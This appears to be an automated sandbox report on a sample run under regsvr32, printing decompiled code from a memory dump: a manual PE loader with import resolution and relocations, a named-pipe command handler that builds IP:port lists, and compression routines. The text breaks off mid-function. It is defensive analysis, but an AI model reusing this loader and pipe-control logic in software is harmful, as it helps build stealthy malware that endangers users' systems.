            • Instruction ID: 82d16ac94bb1756c18f74e1f8a3a8f6e9fb56b1c901ed09025537478cf80c531
            • Opcode Fuzzy Hash: 5afcbedcc176c7f9123d48337d1cbad2b01c4a5453916b719909056950c8aa50
            • Instruction Fuzzy Hash: 36211975900218BFDB04DFE4CD88DAEBBBDEF88254B244499E505EB250D770AE01CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 20%
            			E03173DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
            				signed int _v5;
            				signed short _v12;
            				intOrPtr* _v16;
            				intOrPtr _v20;
            				signed int* _v24;
            				unsigned int _v28;
            				signed short* _v32;
            				struct HINSTANCE__* _v36;
            				signed int _v40;
            				signed int _v44;
            				intOrPtr* _v48;
            				signed short* _v52;
            				intOrPtr _v56;
            				unsigned int _v60;
            				intOrPtr _v64;
            				_Unknown_base(*)()* _v68;
            				signed int _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				intOrPtr _v84;
            				unsigned int _v88;
            				intOrPtr _v92;
            				signed int _v96;
            				intOrPtr _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				intOrPtr _v112;
            				CHAR* _v116;
            				signed int _v120;
            				intOrPtr _v124;
            				signed int _v128;
            				signed int _v132;
            				signed int _t216;
            				signed int _t233;
            				void* _t273;
            				signed int _t278;
            				signed int _t280;
            				intOrPtr _t320;
            
            				_v44 = _v44 & 0x00000000;
            				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            				_v20 = _v84;
            				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
            				_v64 = _t320;
            				if(_t320 == 0) {
            					L13:
            					while(0 != 0) {
            					}
            					_push(8);
            					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
            						L35:
            						if(_a16 == 0) {
            							L54:
            							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
            							while(0 != 0) {
            							}
            							if(_a12 != 0) {
            								 *_a12 = _v80;
            							}
            							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
            							_v124 = _v80(_a4, 1, _a8);
            							while(0 != 0) {
            							}
            							if(_v124 != 0) {
            								if(_v44 == 0) {
            									L77:
            									return 1;
            								}
            								if(_a20 != 1) {
            									if(_a20 != 2) {
            										L75:
            										while(0 != 0) {
            										}
            										goto L77;
            									}
            									while(0 != 0) {
            									}
            									_v132 = _v44;
            									goto L75;
            								}
            								while(0 != 0) {
            								}
            								_v44();
            								goto L75;
            							}
            							while(0 != 0) {
            							}
            							return 0;
            						}
            						while(0 != 0) {
            						}
            						_push(8);
            						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
            							goto L54;
            						}
            						_v128 = 0x80000000;
            						_t216 = 8;
            						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
            						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
            						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
            						_v104 =  *((intOrPtr*)(_v76 + 0x18));
            						while(0 != 0) {
            						}
            						_v40 = _v40 & 0x00000000;
            						while(_v40 < _v104) {
            							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
            							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
            							if(lstrcmpA(_v116, _a16) != 0) {
            								_v40 = _v40 + 1;
            								continue;
            							}
            							while(0 != 0) {
            							}
            							_v44 = _v120;
            							break;
            						}
            						if(_v44 != 0) {
            							goto L54;
            						}
            						while(0 != 0) {
            						}
            						return 0xffffffff;
            					}
            					_v96 = 0x80000000;
            					_t233 = 8;
            					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						if(_v36 == 0) {
            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						}
            						if(_v36 != 0) {
            							if( *_v16 == 0) {
            								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
            							} else {
            								_v24 =  *_v16 + _a4;
            							}
            							_v72 = _v72 & 0x00000000;
            							while( *_v24 != 0) {
            								if(( *_v24 & _v96) == 0) {
            									_v100 =  *_v24 + _a4;
            									_v68 = GetProcAddress(_v36, _v100 + 2);
            								} else {
            									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
            								}
            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
            									 *_v24 = _v68;
            								} else {
            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
            								}
            								_v24 =  &(_v24[1]);
            								_v72 = _v72 + 4;
            							}
            							_v16 = _v16 + 0x14;
            							continue;
            						} else {
            							_t273 = 0xfffffffd;
            							return _t273;
            						}
            					}
            					goto L35;
            				}
            				_t278 = 8;
            				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
            				_t280 = 8;
            				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
            				while(0 != 0) {
            				}
            				while(_v56 > 0) {
            					_v28 = _v52[2];
            					_v56 = _v56 - _v28;
            					_v28 = _v28 - 8;
            					_v28 = _v28 >> 1;
            					_v32 =  &(_v52[4]);
            					_v92 = _a4 +  *_v52;
            					_v60 = _v28;
            					while(1) {
            						_v88 = _v60;
            						_v60 = _v60 - 1;
            						if(_v88 == 0) {
            							break;
            						}
            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
            						_v12 =  *_v32 & 0xfff;
            						_v48 = (_v12 & 0x0000ffff) + _v92;
            						if((_v5 & 0x000000ff) != 3) {
            							if((_v5 & 0x000000ff) == 0xa) {
            								 *_v48 =  *_v48 + _v64;
            							}
            						} else {
            							 *_v48 =  *_v48 + _v64;
            						}
            						_v32 =  &(_v32[1]);
            					}
            					_v52 = _v32;
            				}
            				goto L13;
            			}

            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 03173F2E
            • LoadLibraryA.KERNEL32(00000000), ref: 03173F47
            • GetProcAddress.KERNEL32(00000000,?), ref: 03173FA3
            • GetProcAddress.KERNEL32(00000000,?), ref: 03173FC2
            • lstrcmpA.KERNEL32(?,00000000), ref: 031740B3
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: a7eb2d6fc525461c5d54da9ed6ed44e299ceb909318693e75b46f51324b10248
            • Instruction ID: b421b0696326e9acc12e6aa969aeffee4a25e2e291a1d3e1b44c751c69ba62c5
            • Opcode Fuzzy Hash: a7eb2d6fc525461c5d54da9ed6ed44e299ceb909318693e75b46f51324b10248
            • Instruction Fuzzy Hash: D5E1A074A10209DFCB14CFA9C884AADBBF1BF0C354F198559E825EB351DB34A995CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: acac5f7a0e95c6105f8d06dc64b26d212ea358fbce792b0f9088508cc9e466a9
            • Instruction ID: 0b61634a91e182486d465ab7ccb174c883dc3d5b0be66c70dffcf468679b293e
            • Opcode Fuzzy Hash: acac5f7a0e95c6105f8d06dc64b26d212ea358fbce792b0f9088508cc9e466a9
            • Instruction Fuzzy Hash: 1041D431A40249BBDB28DD688D9EABE7639EF4C624F1C0176FD12E7640E361C9E482D1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E031733DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
            				signed int _t12;
            				signed int _t13;
            				signed int _t23;
            				void* _t30;
            				char* _t31;
            				char* _t33;
            				char* _t35;
            				char* _t37;
            				char* _t38;
            				long long* _t40;
            
            				_t30 = __edi;
            				_t12 = _a20;
            				if(_t12 == 0) {
            					_t12 = 0x11;
            				}
            				_t35 = _a4;
            				_push(_t25);
            				 *_t40 = _a12;
            				_push(_t12);
            				_push("%.*g");
            				_push(_a8);
            				_push(_t35);
            				L03173533();
            				_t23 = _t12;
            				if(_t23 < 0 || _t23 >= _a8) {
            					L16:
            					_t13 = _t12 | 0xffffffff;
            					goto L17;
            				} else {
            					E031733B3(_t12, _t35);
            					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
            						L8:
            						_push(_t30);
            						_t37 = strchr(_t35, 0x65);
            						_t31 = _t37;
            						if(_t37 == 0) {
            							L15:
            							_t13 = _t23;
            							L17:
            							return _t13;
            						}
            						_t38 = _t37 + 1;
            						_t33 = _t31 + 2;
            						if( *_t38 == 0x2d) {
            							_t38 = _t33;
            						}
            						while( *_t33 == 0x30) {
            							_t33 = _t33 + 1;
            						}
            						if(_t33 != _t38) {
            							E03168ECB(_t38, _t33, _t23 - _t33 + _a4);
            							_t23 = _t23 + _t38 - _t33;
            						}
            						goto L15;
            					} else {
            						_t6 = _t23 + 3; // 0x3171bc5
            						_t12 = _t6;
            						if(_t12 >= _a8) {
            							goto L16;
            						}
            						_t35[_t23] = 0x302e;
            						( &(_t35[2]))[_t23] = 0;
            						_t23 = _t23 + 2;
            						goto L8;
            					}
            				}
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: f6ff1893ced5d9b9b0041d6c38e8925e1300bb68c89727643d4361be5cae1ae1
            • Instruction ID: 61ccea0782b1537abfc034fb707e20e6972be353f43972323fe7cfa1a10c4094
            • Opcode Fuzzy Hash: f6ff1893ced5d9b9b0041d6c38e8925e1300bb68c89727643d4361be5cae1ae1
            • Instruction Fuzzy Hash: 9B218B2A600714A7DB2BDE1CEC85BAE77BC9F0C760F1C0864F8668A180E7A5D94063D5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 62%
            			E03163775(void* __fp0) {
            				signed int _v144;
            				signed int _v152;
            				char _v160;
            				char _v164;
            				char _v168;
            				signed int _v172;
            				char _v176;
            				intOrPtr _v180;
            				signed int _v184;
            				signed int _v188;
            				signed int _v192;
            				signed int _v196;
            				char _v200;
            				signed int _v204;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				signed int _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t87;
            				signed int _t88;
            				signed int _t100;
            				void* _t102;
            				void* _t103;
            				unsigned int* _t104;
            				signed int _t110;
            				signed int _t113;
            				void* _t118;
            				intOrPtr _t124;
            				signed int _t127;
            				intOrPtr _t129;
            				intOrPtr _t132;
            				void* _t133;
            				void* _t136;
            				signed int _t145;
            				signed int _t147;
            				signed short* _t148;
            				signed int _t158;
            				intOrPtr* _t182;
            				void* _t186;
            				void* _t187;
            				void* _t188;
            				signed short* _t191;
            				void* _t195;
            				signed int _t198;
            				signed int _t199;
            				signed int _t203;
            				signed int _t204;
            				char _t205;
            				signed int _t207;
            				void* _t209;
            				void* _t215;
            				void* _t222;
            
            				_t222 = __fp0;
            				_t209 = (_t207 & 0xfffffff8) - 0xac;
            				_v144 = 0;
            				_v172 = 0;
            				while(1) {
            					_t72 =  *0x317f8d0; // 0x4faf8c0
            					_push(0);
            					_push( *0x317f8b4);
            					_v152 = 0;
            					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
            						break;
            					}
            					_push(0);
            					_push( &_v160);
            					_t75 =  *0x317f8d0; // 0x4faf8c0
            					_push(0x80000);
            					_push( *0x317f974);
            					_push( *0x317f8b4);
            					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
            						GetLastError();
            						goto L56;
            					} else {
            						_t148 =  *0x317f974; // 0x0
            						_t80 =  *_t148 & 0x0000ffff;
            						_t215 = _t80 - 8;
            						if(_t215 > 0) {
            							_t81 = _t80 - 9;
            							__eflags = _t81;
            							if(_t81 == 0) {
            								E031709C3( &_v200);
            								L12:
            								_t84 =  &_v200;
            								L13:
            								_push(4);
            								L14:
            								_push(_t84);
            								_push(5);
            								L31:
            								_pop(_t186);
            								E0316D297(_t186);
            								L32:
            								L56:
            								DisconnectNamedPipe( *0x317f8b4);
            								_push(0);
            								_pop(0);
            								_push(1);
            								_pop(1);
            								if(_v172 == 0) {
            									continue;
            								}
            								break;
            							}
            							_t87 = _t81;
            							__eflags = _t87;
            							if(_t87 == 0) {
            								_v204 = 0;
            								_t88 = E031616B0( &_v204, _t222);
            								_v188 = _t88;
            								__eflags = _t88;
            								if(_t88 == 0) {
            									_push(4);
            									_v192 = 0;
            									_push( &_v192);
            									L19:
            									_push(0xa);
            									goto L31;
            								}
            								_t145 = _v204;
            								_t90 = _t145 * 0x16;
            								_v184 = _t145 * 0x16;
            								_t203 = E03168DC9(_t90);
            								_v192 = _t203;
            								__eflags = _t203;
            								if(_t203 == 0) {
            									_t64 =  &_v192;
            									 *_t64 = _v192 & 0x00000000;
            									__eflags =  *_t64;
            									_push(4);
            									_push( &_v192);
            									_t187 = 0xa;
            									E0316D297(_t187);
            									L52:
            									E03168DDF( &_v188, _t145);
            									goto L32;
            								}
            								_t198 = 0;
            								__eflags = _t145;
            								if(_t145 == 0) {
            									L50:
            									_push(E0316A5D0(_t203));
            									_push(_t203);
            									_t188 = 5;
            									E0316D297(_t188);
            									E03168DDF( &_v192, 0xffffffff);
            									_t209 = _t209 + 0x10;
            									goto L52;
            								}
            								_t158 = _v188 + 4;
            								__eflags = _t158;
            								_v204 = _t158;
            								do {
            									__eflags = _t198;
            									if(_t198 != 0) {
            										__eflags = _t198 - _t145 - 1;
            										if(_t198 < _t145 - 1) {
            											_t102 = E0316A5D0(_t203);
            											_t158 = _v204;
            											 *((short*)(_t102 + _t203)) = 0x3b;
            										}
            									}
            									_t100 =  *_t158;
            									_v196 = _t100;
            									__eflags = _t100;
            									if(_t100 != 0) {
            										_t103 = E0316A5D0(_t203);
            										_t104 = _v204;
            										_push(_t104[1] & 0x0000ffff);
            										_push( *_t104 >> 0x18);
            										_push(_t104[0] & 0x000000ff);
            										_push(_t104[0] & 0x000000ff);
            										_t110 = E0316A5D0(_t203) + _t203;
            										__eflags = _t110;
            										E03169FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
            										_t158 = _v204;
            										_t209 = _t209 + 0x20;
            									}
            									_t198 = _t198 + 1;
            									_t158 = _t158 + 0x20;
            									_v204 = _t158;
            									__eflags = _t198 - _t145;
            								} while (_t198 < _t145);
            								goto L50;
            							}
            							__eflags = _t87 != 1;
            							if(_t87 != 1) {
            								goto L56;
            							}
            							_v204 = 0;
            							_t113 = E031616B0( &_v204, _t222);
            							_t204 = _v204;
            							_v196 = _t113;
            							__eflags = _t113;
            							if(_t113 != 0) {
            								E03168DDF( &_v196, _t204);
            							}
            							_v204 = _t204 * 0x16;
            							_t84 =  &_v204;
            							goto L13;
            						}
            						if(_t215 == 0) {
            							_t84 = E031709C3( &_v200);
            							L16:
            							__eflags = _t84;
            							if(_t84 == 0) {
            								_push(0);
            								_push(0);
            								goto L19;
            							}
            							_push(_v200);
            							goto L14;
            						}
            						_t118 = _t80 - 1;
            						if(_t118 == 0) {
            							_t199 = E03169D29( &(_t148[4]), 0x20, 1,  &_v176);
            							_v196 = _t199;
            							__eflags = _t199;
            							if(_t199 == 0) {
            								L30:
            								_t191 =  *0x317f974; // 0x0
            								E0316A06E( &_v164,  &(_t191[4]), 0x80);
            								_push(0x84);
            								_push( &_v168);
            								_push(2);
            								goto L31;
            							}
            							_t205 = _v176;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								_t124 = E03161D97(E0316A102( *_t199, __eflags), 0, 0, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t124;
            								goto L30;
            							}
            							_t125 = _t205 - 1;
            							_v184 = _t205 - 1;
            							_t127 = E03168DC9(_t125 << 2);
            							_v188 = _t127;
            							__eflags = _t127;
            							if(_t127 == 0) {
            								goto L30;
            							}
            							_t147 = 1;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								L28:
            								_t129 = E03161D97(E0316A102( *_t199, __eflags), _t127, _v184, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t129;
            								E03169E22( &_v176);
            								goto L30;
            							}
            							_v204 = _t127;
            							do {
            								_t132 = E03169A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0316A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
            								_t182 = _v204;
            								_t147 = _t147 + 1;
            								 *_t182 = _t132;
            								_v204 = _t182 + 4;
            								__eflags = _t147 - _t205;
            							} while (__eflags < 0);
            							_t127 = _v188;
            							goto L28;
            						}
            						_t133 = _t118 - 3;
            						if(_t133 == 0) {
            							_push(0);
            							_push(0);
            							_t195 = 5;
            							E0316D297(_t195);
            							 *0x317f9a8 = 1;
            							_v172 = 1;
            							goto L56;
            						}
            						_t136 = _t133;
            						if(_t136 == 0) {
            							_t84 = E031709A1( &_v200);
            							goto L16;
            						}
            						if(_t136 != 1) {
            							goto L56;
            						}
            						E031709A1( &_v200);
            						goto L12;
            					}
            				}
            				return 0;
            			}

























































            APIs
            • GetLastError.KERNEL32 ref: 031637AB
              • Part of subcall function 0316D297: FlushFileBuffers.KERNEL32(00000000,?,03163ABB,00000000,00000004), ref: 0316D2DD
            • DisconnectNamedPipe.KERNEL32 ref: 03163AF8
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: d450250336eef9c0104b162a15f9b0ca6e177ad1fc79dadb8e9768a06352cc3f
            • Instruction ID: 71640700cbe53df89141bfec963ed72620fec1f50c779b8300d29103a39a59bc
            • Opcode Fuzzy Hash: d450250336eef9c0104b162a15f9b0ca6e177ad1fc79dadb8e9768a06352cc3f
            • Instruction Fuzzy Hash: 22A1717A508301AFD314EFA4D884A6BB7ECEF8C314F084D1EF565DA190DB34D9658B61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E0317376C(signed int __eax, void* __ecx, intOrPtr _a4) {
            				intOrPtr* _v8;
            				signed int* _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				struct HINSTANCE__* _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				struct HINSTANCE__* _v48;
            				intOrPtr _v52;
            				signed int _v56;
            				intOrPtr _v60;
            				signed int _v64;
            				signed int _t109;
            				signed int _t112;
            				signed int _t115;
            				void* _t163;
            				void* _t167;
            
            				_t167 = __ecx;
            				_v44 = _v44 & 0x00000000;
            				if(_a4 != 0) {
            					_v48 = GetModuleHandleA("kernel32.dll");
            					_v40 = E0316F024(_t167, _v48, "GetProcAddress");
            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            					_v32 = _v52;
            					_t109 = 8;
            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
            						L24:
            						return 0;
            					}
            					_v56 = 0x80000000;
            					_t112 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_v8 = _v8 + 0x14;
            					}
            					_t115 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_t34 = _v8 + 0xc; // 0xffff
            						_v36 = LoadLibraryA( *_t34 + _a4);
            						if(_v36 != 0) {
            							if( *_v8 == 0) {
            								_t43 = _v8 + 0x10; // 0xb8
            								_v12 =  *_t43 + _a4;
            							} else {
            								_v12 =  *_v8 + _a4;
            							}
            							_v28 = _v28 & 0x00000000;
            							while( *_v12 != 0) {
            								_v24 = _v24 & 0x00000000;
            								_v16 = _v16 & 0x00000000;
            								_v64 = _v64 & 0x00000000;
            								_v20 = _v20 & 0x00000000;
            								if(( *_v12 & _v56) == 0) {
            									_v60 =  *_v12 + _a4;
            									_v20 = _v60 + 2;
            									_t73 = _v8 + 0x10; // 0xb8
            									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
            									_v16 = _v40(_v36, _v20);
            								} else {
            									_v24 =  *_v12;
            									_v20 = _v24 & 0x0000ffff;
            									_v16 = _v40(_v36, _v20);
            								}
            								if(_v24 != _v16) {
            									_v44 = _v44 + 1;
            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
            										 *_v12 = _v16;
            									} else {
            										_t89 = _v8 + 0x10; // 0xb8
            										 *( *_t89 + _a4 + _v28) = _v16;
            									}
            								}
            								_v12 =  &(_v12[1]);
            								_v28 = _v28 + 4;
            							}
            							_v8 = _v8 + 0x14;
            							continue;
            						}
            						_t163 = 0xfffffffd;
            						return _t163;
            					}
            					goto L24;
            				}
            				return __eax | 0xffffffff;
            			}

            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 03173789
            • LoadLibraryA.KERNEL32(00000000), ref: 03173822
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: db6d12e7b2a6b2644d89b0bf927364cb418ce0b3146a58b1244974659a882714
            • Instruction ID: 2755a6eed7b06d08478b98af5b226fdd0adbea621ba78282938b543a3b48d047
            • Opcode Fuzzy Hash: db6d12e7b2a6b2644d89b0bf927364cb418ce0b3146a58b1244974659a882714
            • Instruction Fuzzy Hash: 18617F79D00209EFDB04CF98C485BADBBF1FF08315F288599E465AB291D774AA81DF90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 99%
            			E03174160(int _a4, signed int _a8) {
            				int _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void* __esi;
            				void* _t137;
            				signed int _t141;
            				intOrPtr* _t142;
            				signed int _t145;
            				signed int _t146;
            				intOrPtr _t151;
            				intOrPtr _t161;
            				intOrPtr _t162;
            				intOrPtr _t167;
            				intOrPtr _t170;
            				signed int _t172;
            				intOrPtr _t173;
            				int _t184;
            				intOrPtr _t185;
            				intOrPtr _t188;
            				signed int _t189;
            				void* _t195;
            				int _t202;
            				int _t208;
            				intOrPtr _t217;
            				signed int _t218;
            				int _t219;
            				intOrPtr _t220;
            				signed int _t221;
            				signed int _t222;
            				int _t224;
            				int _t225;
            				signed int _t227;
            				intOrPtr _t228;
            				int _t232;
            				int _t234;
            				signed int _t235;
            				int _t239;
            				void* _t240;
            				int _t245;
            				int _t252;
            				signed int _t253;
            				int _t254;
            				void* _t257;
            				void* _t258;
            				int _t259;
            				intOrPtr _t260;
            				int _t261;
            				signed int _t269;
            				signed int _t271;
            				intOrPtr* _t272;
            				void* _t273;
            
            				_t253 = _a8;
            				_t272 = _a4;
            				_t3 = _t272 + 0xc; // 0x452bf84d
            				_t4 = _t272 + 0x2c; // 0x8df075ff
            				_t228 =  *_t4;
            				_t137 =  *_t3 + 0xfffffffb;
            				_t229 =  <=  ? _t137 : _t228;
            				_v16 =  <=  ? _t137 : _t228;
            				_t269 = 0;
            				_a4 =  *((intOrPtr*)( *_t272 + 4));
            				asm("o16 nop [eax+eax]");
            				while(1) {
            					_t8 = _t272 + 0x16bc; // 0x5d08408b
            					_t141 =  *_t8 + 0x2a >> 3;
            					_v12 = 0xffff;
            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
            					if(_t217 < _t141) {
            						break;
            					}
            					_t11 = _t272 + 0x6c; // 0x51ec8b55
            					_t12 = _t272 + 0x5c; // 0xee85000
            					_t245 =  *_t11 -  *_t12;
            					_v8 = _t245;
            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
            					_t247 =  <  ? _t195 : _v12;
            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
            					if(_t227 >= _v16) {
            						L7:
            						if(_t253 != 4) {
            							L10:
            							_t269 = 0;
            							__eflags = 0;
            						} else {
            							_t285 = _t227 - _t195;
            							if(_t227 != _t195) {
            								goto L10;
            							} else {
            								_t269 = _t253 - 3;
            							}
            						}
            						E03177180(_t272, _t272, 0, 0, _t269);
            						_t18 = _t272 + 0x14; // 0xc703f045
            						_t19 = _t272 + 8; // 0x8d000040
            						 *( *_t18 +  *_t19 - 4) = _t227;
            						_t22 = _t272 + 0x14; // 0xc703f045
            						_t23 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
            						_t26 = _t272 + 0x14; // 0xc703f045
            						_t27 = _t272 + 8; // 0x8d000040
            						 *( *_t26 +  *_t27 - 2) =  !_t227;
            						_t30 = _t272 + 0x14; // 0xc703f045
            						_t31 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
            						E03175EE0(_t285,  *_t272);
            						_t202 = _v8;
            						_t273 = _t273 + 0x14;
            						if(_t202 != 0) {
            							_t208 =  >  ? _t227 : _t202;
            							_v8 = _t208;
            							_t36 = _t272 + 0x38; // 0xf47d8bff
            							_t37 = _t272 + 0x5c; // 0xee85000
            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
            							_t273 = _t273 + 0xc;
            							_t252 = _v8;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
            							_t227 = _t227 - _t252;
            						}
            						if(_t227 != 0) {
            							E03176020( *_t272,  *( *_t272 + 0xc), _t227);
            							_t273 = _t273 + 0xc;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
            						}
            						_t253 = _a8;
            						if(_t269 == 0) {
            							continue;
            						}
            					} else {
            						if(_t227 != 0 || _t253 == 4) {
            							if(_t253 != 0 && _t227 == _t195) {
            								goto L7;
            							}
            						}
            					}
            					break;
            				}
            				_t142 =  *_t272;
            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
            				_a4 = _t232;
            				if(_t232 == 0) {
            					_t83 = _t272 + 0x6c; // 0x51ec8b55
            					_t254 =  *_t83;
            				} else {
            					_t59 = _t272 + 0x2c; // 0x8df075ff
            					_t224 =  *_t59;
            					if(_t232 < _t224) {
            						_t65 = _t272 + 0x3c; // 0x830cc483
            						_t66 = _t272 + 0x6c; // 0x51ec8b55
            						_t260 =  *_t66;
            						__eflags =  *_t65 - _t260 - _t232;
            						if( *_t65 - _t260 <= _t232) {
            							_t67 = _t272 + 0x38; // 0xf47d8bff
            							_t261 = _t260 - _t224;
            							 *(_t272 + 0x6c) = _t261;
            							memcpy( *_t67,  *_t67 + _t224, _t261);
            							_t70 = _t272 + 0x16b0; // 0x8508458b
            							_t188 =  *_t70;
            							_t273 = _t273 + 0xc;
            							_t232 = _a4;
            							__eflags = _t188 - 2;
            							if(_t188 < 2) {
            								_t189 = _t188 + 1;
            								__eflags = _t189;
            								 *(_t272 + 0x16b0) = _t189;
            							}
            						}
            						_t73 = _t272 + 0x38; // 0xf47d8bff
            						_t74 = _t272 + 0x6c; // 0x51ec8b55
            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
            						_t225 = _a4;
            						_t273 = _t273 + 0xc;
            						_t76 = _t272 + 0x6c;
            						 *_t76 =  *(_t272 + 0x6c) + _t225;
            						__eflags =  *_t76;
            						_t78 = _t272 + 0x6c; // 0x51ec8b55
            						_t184 =  *_t78;
            						_t79 = _t272 + 0x2c; // 0x8df075ff
            						_t239 =  *_t79;
            					} else {
            						 *(_t272 + 0x16b0) = 2;
            						_t61 = _t272 + 0x38; // 0xf47d8bff
            						memcpy( *_t61,  *_t142 - _t224, _t224);
            						_t62 = _t272 + 0x2c; // 0x8df075ff
            						_t184 =  *_t62;
            						_t273 = _t273 + 0xc;
            						_t225 = _a4;
            						_t239 = _t184;
            						 *(_t272 + 0x6c) = _t184;
            					}
            					_t254 = _t184;
